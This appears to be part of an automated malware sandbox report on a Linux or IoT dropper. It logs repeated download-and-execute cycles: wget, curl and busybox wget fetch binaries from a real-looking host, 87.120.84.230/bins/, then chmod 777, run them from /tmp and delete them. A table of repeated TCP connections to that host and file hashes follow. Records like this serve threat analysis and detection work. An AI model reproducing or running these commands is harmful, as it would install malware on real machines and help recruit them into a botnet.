[curl -O http://87.120.84.230/bins/qCtRgxIpi33SQYgZrZeXHBwb5JqVl9PC1f]
/bin/busybox
[/bin/busybox wget http://87.120.84.230/bins/qCtRgxIpi33SQYgZrZeXHBwb5JqVl9PC1f]
/bin/chmod
[chmod 777 qCtRgxIpi33SQYgZrZeXHBwb5JqVl9PC1f]
/tmp/qCtRgxIpi33SQYgZrZeXHBwb5JqVl9PC1f
[./qCtRgxIpi33SQYgZrZeXHBwb5JqVl9PC1f]
/bin/rm
[rm qCtRgxIpi33SQYgZrZeXHBwb5JqVl9PC1f]
/usr/bin/wget
[wget http://87.120.84.230/bins/hasZYOoq1Mr6rt2kBkyFmPc9kRyLEYUtHU]
/usr/bin/curl
[curl -O http://87.120.84.230/bins/hasZYOoq1Mr6rt2kBkyFmPc9kRyLEYUtHU]
/bin/busybox
[/bin/busybox wget http://87.120.84.230/bins/hasZYOoq1Mr6rt2kBkyFmPc9kRyLEYUtHU]
/bin/chmod
[chmod 777 hasZYOoq1Mr6rt2kBkyFmPc9kRyLEYUtHU]
/tmp/hasZYOoq1Mr6rt2kBkyFmPc9kRyLEYUtHU
[./hasZYOoq1Mr6rt2kBkyFmPc9kRyLEYUtHU]
/bin/rm
[rm hasZYOoq1Mr6rt2kBkyFmPc9kRyLEYUtHU]
/usr/bin/wget
[wget http://87.120.84.230/bins/LuIg7oxtWX8Oz8cK0UrnvBBrpNbcYca6qo]
/usr/bin/curl
[curl -O http://87.120.84.230/bins/LuIg7oxtWX8Oz8cK0UrnvBBrpNbcYca6qo]
/bin/busybox
[/bin/busybox wget http://87.120.84.230/bins/LuIg7oxtWX8Oz8cK0UrnvBBrpNbcYca6qo]
/bin/chmod
[chmod 777 LuIg7oxtWX8Oz8cK0UrnvBBrpNbcYca6qo]
/tmp/LuIg7oxtWX8Oz8cK0UrnvBBrpNbcYca6qo
[./LuIg7oxtWX8Oz8cK0UrnvBBrpNbcYca6qo]
/bin/rm
[rm LuIg7oxtWX8Oz8cK0UrnvBBrpNbcYca6qo]
/usr/bin/wget
[wget http://87.120.84.230/bins/waAPo0qq3lo5zSiiYrKkRFSOLMterXjzXF]
/usr/bin/curl
[curl -O http://87.120.84.230/bins/waAPo0qq3lo5zSiiYrKkRFSOLMterXjzXF]
/bin/busybox
[/bin/busybox wget http://87.120.84.230/bins/waAPo0qq3lo5zSiiYrKkRFSOLMterXjzXF]
/bin/chmod
[chmod 777 waAPo0qq3lo5zSiiYrKkRFSOLMterXjzXF]
/tmp/waAPo0qq3lo5zSiiYrKkRFSOLMterXjzXF
[./waAPo0qq3lo5zSiiYrKkRFSOLMterXjzXF]
/bin/rm
[rm waAPo0qq3lo5zSiiYrKkRFSOLMterXjzXF]
/usr/bin/wget
[wget http://87.120.84.230/bins/quWUuwIzy6vsLENFXXKqVqPpjy54CzVvZ0]
/usr/bin/curl
[curl -O http://87.120.84.230/bins/quWUuwIzy6vsLENFXXKqVqPpjy54CzVvZ0]
/bin/busybox
[/bin/busybox wget http://87.120.84.230/bins/quWUuwIzy6vsLENFXXKqVqPpjy54CzVvZ0]
/bin/chmod
[chmod 777 quWUuwIzy6vsLENFXXKqVqPpjy54CzVvZ0]
/tmp/quWUuwIzy6vsLENFXXKqVqPpjy54CzVvZ0
[./quWUuwIzy6vsLENFXXKqVqPpjy54CzVvZ0]
/bin/rm
[rm quWUuwIzy6vsLENFXXKqVqPpjy54CzVvZ0]
/usr/bin/wget
[wget http://87.120.84.230/bins/0aqU8R5HGJK6Gy8ddl6f8xZLaxaxTW3YUD]
/usr/bin/curl
[curl -O http://87.120.84.230/bins/0aqU8R5HGJK6Gy8ddl6f8xZLaxaxTW3YUD]
/bin/busybox
[/bin/busybox wget http://87.120.84.230/bins/0aqU8R5HGJK6Gy8ddl6f8xZLaxaxTW3YUD]
/bin/chmod
[chmod 777 0aqU8R5HGJK6Gy8ddl6f8xZLaxaxTW3YUD]
/tmp/0aqU8R5HGJK6Gy8ddl6f8xZLaxaxTW3YUD
[./0aqU8R5HGJK6Gy8ddl6f8xZLaxaxTW3YUD]
/bin/rm
[rm 0aqU8R5HGJK6Gy8ddl6f8xZLaxaxTW3YUD]
/usr/bin/wget
[wget http://87.120.84.230/bins/zSu3Rig2tv4lY9srLgbuCuyUVOeytO0aWt]
/usr/bin/curl
[curl -O http://87.120.84.230/bins/zSu3Rig2tv4lY9srLgbuCuyUVOeytO0aWt]
/bin/busybox
[/bin/busybox wget http://87.120.84.230/bins/zSu3Rig2tv4lY9srLgbuCuyUVOeytO0aWt]
/bin/chmod
[chmod 777 zSu3Rig2tv4lY9srLgbuCuyUVOeytO0aWt]
/tmp/zSu3Rig2tv4lY9srLgbuCuyUVOeytO0aWt
[./zSu3Rig2tv4lY9srLgbuCuyUVOeytO0aWt]
/bin/rm
[rm zSu3Rig2tv4lY9srLgbuCuyUVOeytO0aWt]
/usr/bin/wget
[wget http://87.120.84.230/bins/xVq2EhWxzvf5Gccyzr98v9YbrJkL9zYNVF]
/usr/bin/curl
[curl -O http://87.120.84.230/bins/xVq2EhWxzvf5Gccyzr98v9YbrJkL9zYNVF]
/bin/busybox
[/bin/busybox wget http://87.120.84.230/bins/xVq2EhWxzvf5Gccyzr98v9YbrJkL9zYNVF]
/bin/chmod
[chmod 777 xVq2EhWxzvf5Gccyzr98v9YbrJkL9zYNVF]
/tmp/xVq2EhWxzvf5Gccyzr98v9YbrJkL9zYNVF
[./xVq2EhWxzvf5Gccyzr98v9YbrJkL9zYNVF]
/bin/rm
[rm xVq2EhWxzvf5Gccyzr98v9YbrJkL9zYNVF]
/usr/bin/wget
[wget http://87.120.84.230/bins/CApM71rTkzSjYcX0rpnoxmCwpYe4hB9BRs]
/usr/bin/curl
[curl -O http://87.120.84.230/bins/CApM71rTkzSjYcX0rpnoxmCwpYe4hB9BRs]
/bin/busybox
[/bin/busybox wget http://87.120.84.230/bins/CApM71rTkzSjYcX0rpnoxmCwpYe4hB9BRs]
/bin/chmod
[chmod 777 CApM71rTkzSjYcX0rpnoxmCwpYe4hB9BRs]
/tmp/CApM71rTkzSjYcX0rpnoxmCwpYe4hB9BRs
[./CApM71rTkzSjYcX0rpnoxmCwpYe4hB9BRs]
/bin/rm
[rm CApM71rTkzSjYcX0rpnoxmCwpYe4hB9BRs]
/usr/bin/wget
[wget http://87.120.84.230/bins/jvViiUTrVHYbd3MPLT2sqvuMltbJsZTUOa]
/usr/bin/curl
[curl -O http://87.120.84.230/bins/jvViiUTrVHYbd3MPLT2sqvuMltbJsZTUOa]
/bin/busybox
[/bin/busybox wget http://87.120.84.230/bins/jvViiUTrVHYbd3MPLT2sqvuMltbJsZTUOa]
/bin/chmod
[chmod 777 jvViiUTrVHYbd3MPLT2sqvuMltbJsZTUOa]
/tmp/jvViiUTrVHYbd3MPLT2sqvuMltbJsZTUOa
[./jvViiUTrVHYbd3MPLT2sqvuMltbJsZTUOa]
/bin/rm
[rm jvViiUTrVHYbd3MPLT2sqvuMltbJsZTUOa]
/usr/bin/wget
[wget http://87.120.84.230/bins/GTsKuVj4s0hueFlloUzz3ytEb6VMBaW6Ms]
/usr/bin/curl
[curl -O http://87.120.84.230/bins/GTsKuVj4s0hueFlloUzz3ytEb6VMBaW6Ms]
Network
| Country | Destination | Domain | Proto |
| DE | 87.120.84.230:80 | 87.120.84.230 | tcp |
| DE | 87.120.84.230:80 | 87.120.84.230 | tcp |
| DE | 87.120.84.230:80 | 87.120.84.230 | tcp |
| DE | 87.120.84.230:80 | 87.120.84.230 | tcp |
| DE | 87.120.84.230:80 | 87.120.84.230 | tcp |
| DE | 87.120.84.230:80 | 87.120.84.230 | tcp |
| DE | 87.120.84.230:80 | 87.120.84.230 | tcp |
| DE | 87.120.84.230:80 | 87.120.84.230 | tcp |
| DE | 87.120.84.230:80 | 87.120.84.230 | tcp |
| DE | 87.120.84.230:80 | 87.120.84.230 | tcp |
| DE | 87.120.84.230:80 | 87.120.84.230 | tcp |
| DE | 87.120.84.230:80 | 87.120.84.230 | tcp |
| DE | 87.120.84.230:80 | 87.120.84.230 | tcp |
| DE | 87.120.84.230:80 | 87.120.84.230 | tcp |
| DE | 87.120.84.230:80 | 87.120.84.230 | tcp |
| DE | 87.120.84.230:80 | 87.120.84.230 | tcp |
| DE | 87.120.84.230:80 | 87.120.84.230 | tcp |
| DE | 87.120.84.230:80 | 87.120.84.230 | tcp |
| DE | 87.120.84.230:80 | 87.120.84.230 | tcp |
| DE | 87.120.84.230:80 | 87.120.84.230 | tcp |
| DE | 87.120.84.230:80 | 87.120.84.230 | tcp |
| DE | 87.120.84.230:80 | 87.120.84.230 | tcp |
| DE | 87.120.84.230:80 | 87.120.84.230 | tcp |
| DE | 87.120.84.230:80 | 87.120.84.230 | tcp |
| DE | 87.120.84.230:80 | 87.120.84.230 | tcp |
| DE | 87.120.84.230:80 | 87.120.84.230 | tcp |
| DE | 87.120.84.230:80 | 87.120.84.230 | tcp |
| DE | 87.120.84.230:80 | 87.120.84.230 | tcp |
| DE | 87.120.84.230:80 | 87.120.84.230 | tcp |
| DE | 87.120.84.230:80 | 87.120.84.230 | tcp |
| DE | 87.120.84.230:80 | 87.120.84.230 | tcp |
| DE | 87.120.84.230:80 | 87.120.84.230 | tcp |
| DE | 87.120.84.230:80 | 87.120.84.230 | tcp |
| DE | 87.120.84.230:80 | 87.120.84.230 | tcp |
| DE | 87.120.84.230:80 | 87.120.84.230 | tcp |
| DE | 87.120.84.230:80 | 87.120.84.230 | tcp |
| DE | 87.120.84.230:80 | 87.120.84.230 | tcp |
| DE | 87.120.84.230:80 | 87.120.84.230 | tcp |
| DE | 87.120.84.230:80 | 87.120.84.230 | tcp |
| DE | 87.120.84.230:80 | 87.120.84.230 | tcp |
| DE | 87.120.84.230:80 | 87.120.84.230 | tcp |
| DE | 87.120.84.230:80 | 87.120.84.230 | tcp |
| DE | 87.120.84.230:80 | 87.120.84.230 | tcp |
| DE | 87.120.84.230:80 | 87.120.84.230 | tcp |
| DE | 87.120.84.230:80 | 87.120.84.230 | tcp |
| DE | 87.120.84.230:80 | 87.120.84.230 | tcp |
| DE | 87.120.84.230:80 | 87.120.84.230 | tcp |
| DE | 87.120.84.230:80 | 87.120.84.230 | tcp |
| DE | 87.120.84.230:80 | 87.120.84.230 | tcp |
| DE | 87.120.84.230:80 | 87.120.84.230 | tcp |
| DE | 87.120.84.230:80 | 87.120.84.230 | tcp |
| DE | 87.120.84.230:80 | 87.120.84.230 | tcp |
| DE | 87.120.84.230:80 | 87.120.84.230 | tcp |
| DE | 87.120.84.230:80 | 87.120.84.230 | tcp |
| DE | 87.120.84.230:80 | 87.120.84.230 | tcp |
| DE | 87.120.84.230:80 | 87.120.84.230 | tcp |
| DE | 87.120.84.230:80 | 87.120.84.230 | tcp |
| DE | 87.120.84.230:80 | 87.120.84.230 | tcp |
| DE | 87.120.84.230:80 | 87.120.84.230 | tcp |
| DE | 87.120.84.230:80 | 87.120.84.230 | tcp |
| DE | 87.120.84.230:80 | 87.120.84.230 | tcp |
| DE | 87.120.84.230:80 | 87.120.84.230 | tcp |
| DE | 87.120.84.230:80 | 87.120.84.230 | tcp |
| DE | 87.120.84.230:80 | 87.120.84.230 | tcp |
| DE | 87.120.84.230:80 | 87.120.84.230 | tcp |
| DE | 87.120.84.230:80 | 87.120.84.230 | tcp |
| DE | 87.120.84.230:80 | 87.120.84.230 | tcp |
| DE | 87.120.84.230:80 | 87.120.84.230 | tcp |
| DE | 87.120.84.230:80 | 87.120.84.230 | tcp |
| DE | 87.120.84.230:80 | 87.120.84.230 | tcp |
| DE | 87.120.84.230:80 | 87.120.84.230 | tcp |
| DE | 87.120.84.230:80 | 87.120.84.230 | tcp |
| DE | 87.120.84.230:80 | 87.120.84.230 | tcp |
| DE | 87.120.84.230:80 | 87.120.84.230 | tcp |
| DE | 87.120.84.230:80 | 87.120.84.230 | tcp |
| DE | 87.120.84.230:80 | 87.120.84.230 | tcp |
Files
/tmp/GTsKuVj4s0hueFlloUzz3ytEb6VMBaW6Ms
| MD5 | 546071c6a6aeff34580b4d1a9b35a7c3 |
| SHA1 | dc2de298837a86d3bc86e8a328411229d9eccdb6 |
| SHA256 | 2d1255033a3f5cde3fb430b15d84ad95c1d7d37b25132cd3dcca7c30963e9f12 |
| SHA512 | 207f333daf98fe653f4f661defd86651cbb50e3482511769d0558d2fd80ce107ec6a519424e05107740a802b444b62445901788d80dde4e8dbc8ee116d5b9be7 |
/tmp/zSu3Rig2tv4lY9srLgbuCuyUVOeytO0aWt
| MD5 | 998368d7c95ea4293237f2320546e440 |
| SHA1 | 30dfd2d3bb8a7e3241bd7792e90a98ebb70be3a4 |
| SHA256 | 533a1ca5d6595793725bca7641d9461a0f00dd1732dded3e4281196f5dd21736 |
| SHA512 | 648c4720a85dbf834be1ba00f0e1b4167cc670fe15896efb00a77fb6e0c225a13aae3da10d85fa6e7f726420d9bb3c20c43466e02296d44153c127b7160e0b97 |